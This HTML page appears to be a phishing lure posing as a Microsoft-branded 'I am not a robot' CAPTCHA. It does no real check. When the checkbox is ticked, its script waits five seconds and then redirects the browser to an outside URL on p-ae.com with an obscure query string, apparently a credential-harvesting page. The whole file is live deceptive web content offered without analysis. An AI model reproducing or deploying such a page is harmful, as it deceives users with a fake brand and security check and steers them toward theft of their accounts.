<!DOCTYPE html>

<html lang="en"><head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>CAPTCHA</title>
<style>
  body {
    font-family: Arial, sans-serif;
    background: linear-gradient(to bottom right, #FFFFFF, #D9E6F2);
    display: flex;
    justify-content: center;
    align-items: center;
    height: 100vh;
    margin: 0;
  }
  .captcha-box {
    background: white;
    border: 1px solid #ccc;
    border-radius: 5px;
    padding: 7px;
    display: flex;
    flex-direction: column;
    align-items: center;
  }
  .captcha-content {
    display: flex;
    align-items: center;
  }
  .captcha-box img {
    width: 70px;
    height: auto;
  }
  .captcha-text {
    font-size: 15px;
    color: #333;
    display: flex;
    flex-direction: row; 
    align-items: center;
    margin-left: 30px;
    margin-top: 50px; 
  }
  .captcha-text input[type="checkbox"] {
    margin-left: 13px; 
  }
  @keyframes spin {
    from { transform: rotate(0deg); }
    to { transform: rotate(360deg); }
  }
  .loader {
    border: 6px solid #f3f3f3; 
    border-top: 6px solid #3498db;
    border-radius: 50%;
    width: 50px;
    height: 50px;
    animation: spin 2s linear infinite;
    margin-top: 15px;
    margin-right: 200px;
  }
</style>
</head>
<body>
<div class="captcha-box">
  <div class="captcha-content">
    <img src="https://upload.wikimedia.org/wikipedia/commons/9/90/Outlook.com_icon_%282012-2019%29.svg" alt="Microsoft Logo">
    <div class="captcha-text">
      I am not a robot 
      <input type="checkbox" id="captchaCheckbox">
    </div>
  </div>
  <div class="loader"></div> 
</div>

<script>
  document.getElementById("captchaCheckbox").addEventListener("change", function() {
    if (this.checked) {
      var urls = [
        "https://p-ae.com/?gwzwovdz&qrc=",
        "https://p-ae.com/?gwzwovdz&qrc=",
        "https://p-ae.com/?gwzwovdz&qrc=" 
      ];
      var randomUrl = urls[Math.floor(Math.random() * urls.length)]; 
      setTimeout(function() {
        window.location.href = randomUrl; 
      }, 5000);
    }
  });
</script>



</body></html>
